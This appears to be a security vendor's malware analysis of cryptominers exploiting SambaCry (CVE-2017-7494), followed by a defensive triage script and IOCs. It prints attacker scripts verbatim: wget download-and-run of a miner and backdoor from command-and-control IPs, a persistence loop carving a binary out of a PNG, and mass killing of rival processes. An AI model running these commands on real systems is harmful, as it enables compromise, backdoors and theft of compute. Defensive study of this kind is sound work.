Cyphort has been monitoring how threat actors are exploiting computing resources from compromised victims to mine various cryptocurrencies. In our latest discovery, it seems these threat actors are aware of each other's activities and are fighting a battle for control of compromised machines.

As we reported last week, the Samba vulnerability CVE-2017-7494, dubbed SambaCry, is being exploited in the wild to compromise unpatched systems. Various threat actors are racing to gain ground by compromising as many vulnerable systems as possible to establish a foothold. And then the most interesting things happen: some of them resort to closing the vulnerability behind them so no other threat can compromise that system again, a tactic we also reported on from actors exploiting EternalBlue. But more interestingly, they proceed to kill any existing cryptocurrency miner that could already be running on that system, and they do that by going after specific process names. This shows their intelligence gathering is pretty good.

Let us describe one such attack that Cyphort has detected.

Exploitation

The exploitation approach mimics what we described in a previous blog with one notable difference: the method used to launch the binary on the target machine is the SMB method “Create Request File” instead of the previously known “NT Create AndX Request”, which is the one many of the existing Snort rules are written to detect.


Cryptocurrency Miner Payload

Once the exploit executes, it proceeds to download payloads from the internet. In one case, we observed the download of a cryptocurrency miner as well as a backdoor. Here is the script downloading the miner:

#!/bin/sh
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

wget -q http://95.211.58.208/cpuminer -O /tmp/cpuminer
chmod +x /tmp/cpuminer
/tmp/cpuminer

In another case, we observed the payload downloaded as a PNG file cloaking a Linux binary, which then connected to the mining pool at 139.60.160.250.

Securing the foothold

The malware then proceeds to blackhole any traffic to a set of cryptocurrency mining servers, probably the pool used by a rival miner:

ip rule add blackhole to 212.129.44.155
ip rule add blackhole to 212.129.44.156
ip rule add blackhole to 212.129.44.157
ip rule add blackhole to 212.129.46.191
ip rule add blackhole to 212.129.46.87
ip rule add blackhole to 212.83.129.195
ip rule add blackhole to 212.83.168.39
ip rule add blackhole to 212.83.168.41
ip rule add blackhole to 62.210.29.108
route add 188.165.254.85 gw 127.0.0.1 lo
route add 94.23.8.105 gw 127.0.0.1 lo
route add 94.23.206.130 gw 127.0.0.1 lo
route add 188.165.214.76 gw 127.0.0.1 lo
route add 212.129.44.155 gw 127.0.0.1 lo
route add 212.129.44.156 gw 127.0.0.1 lo
route add 212.129.44.157 gw 127.0.0.1 lo
route add 212.129.46.191 gw 127.0.0.1 lo
route add 212.129.46.87 gw 127.0.0.1 lo
route add 212.83.129.195 gw 127.0.0.1 lo
route add 212.83.168.39 gw 127.0.0.1 lo
route add 212.83.168.41 gw 127.0.0.1 lo
route add 62.210.29.108 gw 127.0.0.1 lo

These are IPs of a known Monero cryptocurrency pool hosted in France.

It then proceeds to close the Samba vulnerability by issuing the following commands:

echo "" >> /etc/samba/smb.conf
echo "nt pipe support = no" >> /etc/samba/smb.conf
echo "nt pipe support = no" >> /etc/smb.conf
service smb restart
service samba restart
/etc/init.d/smb restart

In effect, this makes the host safe from future attacks using this vulnerability. But the authors want to keep access for themselves, so they install a backdoor:

cd /tmp
wget http://95.211.58.208/b -O b;chmod +x b;./b

And to make sure no rival exploitation of this host is going on, the malware kills any process named after a .so file found in /tmp, which is where other attackers exploiting the same Samba bug would have dropped their payloads via the share:

ls -A1 /tmp/*.so | sed 's/\/tmp\///g' | awk '{print "killall "$1}' >>/tmp/out;sh /tmp/out;rm -rf /tmp/out

Afterwards, it singles out a couple of rival miners, which are usually installed as processes called ‘m’ or ‘irqbalanc1’, and kills them:

m=`pidof m`
kill -9 $m
cd /tmp
killall irqbalanc1

In a different attack, the author was very specific in targeting known rival miners and killing their processes, first by killing any shell script that was started from the /tmp folder (a sign that the Samba CVE was exploited) and then going after known cryptocurrency miner process names. But this attacker did not close the vulnerability, so they had to keep checking whether a rival miner had invaded their host and, if found, kill it:

#!/bin/sh
ps -ef|grep .sh|grep tmp|grep -v irq|grep -v grep|cut -c 9-15|xargs kill -9
pkill -f /tmp/m
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;
pkill -f 45.76.146.166

ps auxf|grep -v grep|grep "irqbalanc1"|grep defunct|awk '{print $2}'|xargs kill -9
sleepTime=20
ps -fe|grep irqbalanc1 |grep -v defunct|grep -v grep
if [ $? -ne 0 ]
    then
    echo "start process....."
    cat /proc/cpuinfo|grep aes>/dev/null
    if [ $? -ne 1 ]
        then
        wget 91.235.143.149/miu1.png -O /tmp/conn
        dd if=/tmp/conn skip=7664 bs=1 of=/tmp/irqbalanc1
    else
        wget -O /tmp/irqbalanc1 http://91.235.143.149/kworker_na
    fi
    chmod +x /tmp/irqbalanc1
    wget -O /tmp/httpd.conf http://91.235.143.149/httpd2.conf
    nohup /tmp/irqbalanc1  -c /tmp/httpd.conf>/dev/null 2>&1 &
    sleep 5
    rm -rf /tmp/httpd.conf
    rm -rf /tmp/conn
    rm -rf /tmp/conns
    rm -f /tmp/irq.sh
    rm -f /tmp/irqbalanc1
    while [ 0 -lt 1 ]
    do
        ps -fe| grep irqbalanc1 |grep -v defunct| grep -v grep 
        if [ $? -ne 0 ]
            then
            echo "process not exists ,restart process now... "
            cat /proc/cpuinfo|grep aes>/dev/null
            if [ $? -ne 1 ]
                then
                wget 91.235.143.149/miu1.png -O /tmp/conn
                dd if=/tmp/conn skip=7664 bs=1 of=/tmp/irqbalanc1
            else
                wget -O /tmp/irqbalanc1 http://91.235.143.149/kworker_na
            fi
            chmod +x /tmp/irqbalanc1
            wget -O /tmp/httpd.conf http://91.235.143.149/httpd2.conf
            nohup /tmp/irqbalanc1  -c /tmp/httpd.conf>/dev/null 2>&1 &
            sleep 5
            rm -rf /tmp/httpd.conf
            rm -rf /tmp/conn
            rm -rf /tmp/conns
            rm -f /tmp/irq.sh
            rm -f /tmp/irqbalanc1
            echo "restart done ..... "
        else
            echo "process exists , sleep $sleepTime seconds "
            pkill -f JnKihGjn
            pkill -f irqba2anc1
            pkill -f irqba5xnc1
            pkill -f conns
            pkill -f irqbalance
            pkill -f crypto-pool
            pkill -f minexmr
            pkill -f XJnRj
            pkill -f NXLAi
            pkill -f BI5zj
            pkill -f askdljlqw
            pkill -f minerd
            pkill -f Guard.sh
            pkill -f ysaydh
            pkill -f bonns
            pkill -f donns
            pkill -f kxjd
            pkill -f 108.61.186.224
            pkill -f Duck.sh
            pkill -f bonn.sh
            pkill -f conn.sh
            pkill -f kworker34
            pkill -f pro.sh
            pkill -f polkitd
            pkill -f acpid
            ps -ef|grep '.so'|grep -v grep|cut -c 9-15|xargs kill -9;
            pkill -f 45.76.146.166
        fi
        sleep $sleepTime
    done
else
    echo "runing....."

Conclusion

It is interesting to observe the turf war between rival criminal gangs unfold in cyberspace. Cryptocurrency mining is a heavy user of CPU power, and some even resort to using GPUs when available. This has made compute power a sought-after commodity, and each group is trying to protect its prized possessions.

If nothing else, this attack gives us a handy list of process names for currency miners that can be used to detect and clean host machines. Many thanks to Alex Burt from Cyphort Labs for his work on the research.
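As an added example (not code from the original post), here is a small POSIX sh triage helper that turns the artefacts above into host checks: the miner process-name fragments from the kill lists, the "nt pipe support = no" line appended to smb.conf, and the blackhole rules aimed at the rival pool. The ps output, ip rule output and smb.conf content it is demonstrated on are constructed sample data, not captures from the page.

```shell
#!/bin/sh
# Added triage helper (not code from the original post): checks a Linux host
# for the rival-miner artefacts described above. All ps/ip-rule/smb.conf
# input used in the demo at the bottom is CONSTRUCTED sample data.

# Name fragments from the kill lists on this page. The attackers also kill
# legitimate daemons (irqbalance, polkitd, acpid); those are left out on purpose.
MINER_NAMES='cpuminer irqbalanc1 irqba2anc1 irqba5xnc1 minerd minergate minexmr crypto-pool kworker34 JnKihGjn'

# scan_ps: read "ps -eo pid,args" output on stdin and print "PID CMD" for every
# command line that contains one of the fragments (header line is skipped).
scan_ps() {
    while read -r pid cmd; do
        case "$pid" in ''|PID) continue ;; esac
        for name in $MINER_NAMES; do
            case "$cmd" in *"$name"*) printf '%s %s\n' "$pid" "$cmd"; break ;; esac
        done
    done
    return 0
}

# check_smb_conf: flag "nt pipe support = no" sitting in the last lines of the
# given smb.conf, the spot where the sample appends it. Admins can set this
# legitimately, so treat a hit as a lead to confirm, not as proof.
check_smb_conf() {
    if tail -n 2 "$1" | grep -qi 'nt pipe support *= *no'; then
        printf 'FINDING: nt pipe support disabled at end of %s\n' "$1"
    fi
    return 0
}

# count_blackholes: read "ip rule show" output on stdin and count blackhole
# rules; the sample installs nine of them to cut rivals off from their pool.
count_blackholes() {
    grep -c ' blackhole' || true
}
# --- demo on constructed data (on a real host: ps -eo pid,args | scan_ps) ---
SAMPLE_PS='  PID COMMAND
    1 /sbin/init
  812 /usr/sbin/irqbalance
 2231 /tmp/irqbalanc1 -c /tmp/httpd.conf
 2250 /tmp/cpuminer -o stratum+tcp://pool.invalid:3333
 2301 sshd: root@pts/0'
SAMPLE_RULES='0: from all lookup local
32764: from all to 212.129.44.155 blackhole
32765: from all to 212.129.44.156 blackhole
32766: from all lookup main'
printf '%s\n' "$SAMPLE_PS" | scan_ps
printf '%s\n' "$SAMPLE_RULES" | count_blackholes
```

Note that the legitimate /usr/sbin/irqbalance in the sample is not flagged, only the look-alike /tmp/irqbalanc1; pair these checks with a scan for .so files in /tmp and loopback routes to the pool IPs listed above.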

IOCs

exploit: 898f02ca922715109ada8f4718a6848bdcfcb209a99774302d01f6ed8fb13652

Miner: 26a717a7a14f10880a2869949814400b31d1f4c9cc45384be38289b012587468

Miner: d4ec78f0489509a7c8cc253d2d77e283e0f9b2abc657edac6c1595b3749a21ed

Miner: 28d5f75e289d652061c754079b23ec372da2e8feb1066a3d57381163b614c06c

Backdoor: 162de4e95e5e5d35d80ca4cf752c80b2b32b52c9e5fef5551caa20b0d5ed83af

CnC IPs:

91.235.143.149
95.211.58.208